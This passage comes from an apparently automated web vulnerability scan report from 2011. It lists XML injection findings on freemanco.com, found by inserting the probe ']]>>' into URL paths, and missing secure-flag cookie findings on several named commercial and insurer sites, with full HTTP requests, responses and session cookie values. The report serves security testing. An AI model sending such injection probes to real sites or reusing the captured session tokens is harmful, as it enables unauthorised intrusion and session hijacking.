Referer: http://freemanco.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:11:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1184

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

9.12. http://www.freemanco.com/freemanco/ourwork/creativeservices/creative.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.freemanco.com
Path:   /freemanco/ourwork/creativeservices/creative.jsp

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /freemanco]]>>/ourwork/creativeservices/creative.jsp HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/?fs=true&_requestid=118715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmc=95684043; __utmb=95684043.1.10.1303848339; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:50:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1268

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

9.13. http://www.freemanco.com/freemanco/ourwork/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.freemanco.com
Path:   /freemanco/ourwork/images/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /freemanco]]>>/ourwork/images/favicon.ico HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmc=95684043; __utmb=95684043.2.10.1303848339

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:51:21 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1057

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

9.14. http://www.freemanco.com/store [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.freemanco.com
Path:   /store

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /store]]>>?from=freemanco HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://freemanco.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:13:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1184

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

9.15. http://www.freemanco.com/store/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.freemanco.com
Path:   /store/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /store]]>>/?from=freemanco HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://freemanco.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:13:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1184

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

9.16. http://www.freemanco.com/store/freemanco/siteSearch/siteSearch.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.freemanco.com
Path:   /store/freemanco/siteSearch/siteSearch.jsp

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /store]]>>/freemanco/siteSearch/siteSearch.jsp HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/?fs=true&_requestid=118715
Origin: http://www.freemanco.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmc=95684043; __utmb=95684043.1.10.1303848339
Content-Length: 0

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:13:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1268

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

10. SSL cookie without secure flag set  previous  next
There are 15 instances of this issue:


10.1. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=1142057&n=1&sc=4&ck=rcHW8655AeSHwA-v&vid=rcHW8655Ac-HwJur&cktime=96686&cart=776158&gc=clear&ext=F&whence= HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: http://www.magellangps.com/s.nl?sc=3&whence=&custcol_celigo_serialno=
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 21:41:16 GMT
Server: Apache
Location: /s.nl?c=1142057&sc=4&whence=&n=1&ext=F
NS_RTIMER_COMPOSITE: 1113376901:616363742D6A6176613030392E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=LjrDN37cBJJvxH0XfZgYzyDYkyR4yJ2jH3C0msdJq2nh0MrNV1BW8yR6R81HZfQx7Ltv7XzmGqzGY1y32tjZms1VGrt0sSKl9QW2jP1YHBHNxchCbG0H2Q0n7T2vjQNL!39951840; path=/
Set-Cookie: NLVisitorId=rcHW8655Ac-HwJur; domain=checkout.netsuite.com; expires=Monday, 16-Apr-2012 21:41:16 GMT; path=/
Set-Cookie: NLShopperId=rcHW8655AeSHwA-v; domain=checkout.netsuite.com; expires=Tuesday, 03-May-2011 21:41:16 GMT; path=/
Set-Cookie: gc=1142057_clear; domain=checkout.netsuite.com; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect after consuming actionable parameters
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Keep-Alive: timeout=10, max=818
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


10.2. https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myaccount.west.thomson.com
Path:   /MyAccount/AccessControl/AccessControl/SignIn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken= HTTP/1.1
Host: myaccount.west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: MA_ASP.NET_SessionId=wdnkca45qolkzcmo4fjuti55; path=/; HttpOnly
Set-Cookie: .MYACCOUNT=; expires=Tue, 12-Oct-1999 05:00:00 GMT; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24458


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
My Account-West&n
...[SNIP]...

10.3. https://secure.bundle.com/Membership/LogOn  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.bundle.com
Path:   /Membership/LogOn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Membership/LogOn?returnurl=%2Fmsn%2FLoggedIn HTTP/1.1
Host: secure.bundle.com
Connection: keep-alive
Referer: https://secure.bundle.com/msn
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206; SESSIONID=h50b1r45qzwyxs34b22hzjzc; rfr=none%7CBundle%3A%20The%20No.%201%20Source%20for%20How%20People%20Spend%20and%20Save%20Money%20--%20Personal%20Finance%20Data%2C%20Money%20Advice%2C%20Trends%2C%20News%20and%20Community%3A%20https%3A%2F%2Fsecure.bundle.com%2Fmsn

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app01
X-Bundle-Server: prod-web05
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:45:33 GMT
Connection: keep-alive
Set-Cookie: __RequestVerificationToken_Lw__=HnsJb5DxR3JsrwADkF6kOt9xVMG7yhpZzwkhG1bAranocdXh1p+yqmWZxRuF9mgi; path=/; HttpOnly
Cache-Control: private, no-store, max-age=0
Cache-Control: private, no-store, max-age=0
Expires: Tue, 26 Apr 2011 18:45:40 GMT
Expires: Tue, 26 Apr 2011 18:45:40 GMT
Content-Length: 14062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...

10.4. https://secure.bundle.com/services/nocache/Membership/UpdateAuthenticationStateToClient  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.bundle.com
Path:   /services/nocache/Membership/UpdateAuthenticationStateToClient

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/nocache/Membership/UpdateAuthenticationStateToClient HTTP/1.1
Host: secure.bundle.com
Connection: keep-alive
Referer: https://secure.bundle.com/msn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206

Response

HTTP/1.1 200 OK
Content-Length: 29
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app01
X-Bundle-Server: prod-web05
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:41:16 GMT
Connection: keep-alive
Set-Cookie: SESSIONID=h50b1r45qzwyxs34b22hzjzc; domain=.bundle.com; path=/; HttpOnly
Set-Cookie: GreetingName=; domain=.bundle.com; expires=Tue, 02-Jan-0001 00:00:00 GMT; path=/
Cache-Control: private, no-store, max-age=0
Cache-Control: private, no-store, max-age=0

var isLoggedInBundle = false;

10.5. https://www.bcbst.com/accounttools/public/askUserId.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bcbst.com
Path:   /accounttools/public/askUserId.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounttools/public/askUserId.do?usage=forgot HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: http://www.bcbst.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849513702:ss=1303849513702

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Apr 2011 20:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: JSESSIONID=0000JjcWGgqTGgodjkS-3rChz2B:148u7u772; Path=/
Server: WebSphere Application Server/6.1
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b;path=/;secure;httponly
Content-Length: 25749

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


        <html>
<head>
<title>Account Management - BCBST.com</title>
<meta name="page title" content="A
...[SNIP]...

10.6. https://www.bcbst.com/inc/loginform.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bcbst.com
Path:   /inc/loginform.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/loginform.asp?t=0.3263980813790113 HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: https://www.bcbst.com/secure/public/login.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:26:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 837
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD; path=/
Cache-control: private
Content-Length: 837


<script>

</script>
<div>
<form name="mainlogon"
       method="post"
       action="/signon/processlogon.do">
   <div class="user">
       <label>User ID:</label>
       <input name="dnqualifier"
           type="text
...[SNIP]...

10.7. https://www.bcbst.com/secure/public/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bcbst.com
Path:   /secure/public/login.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/public/login.asp HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: https://www.bcbst.com/secure/public/InvalidAccess.shtm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:41:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 29752
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSADSTDQ=JCKBMDCDBIIALLOMEMBMLDPK; path=/
Cache-control: private
Content-Length: 29752


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>BlueAccess - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n" content=""/>
<meta n
...[SNIP]...

10.8. https://www.fusionvm.com/FusionVM/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FusionVM/ HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: CriticalWatch_WinMgmt=7c08e1d9-6975-48a3-9c34-081b0ae79e10; expires=Tue, 26-Apr-2011 22:14:02 GMT; path=/
Set-Cookie: ASP.NET_SessionId=vggqtwwd5coqz310h11pdmez; path=/; HttpOnly
Date: Tue, 26 Apr 2011 21:49:02 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2>
</body></html>

10.9. https://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /GlobalBackgroundStyles.5.1.421.22.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GlobalBackgroundStyles.5.1.421.22.ashx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
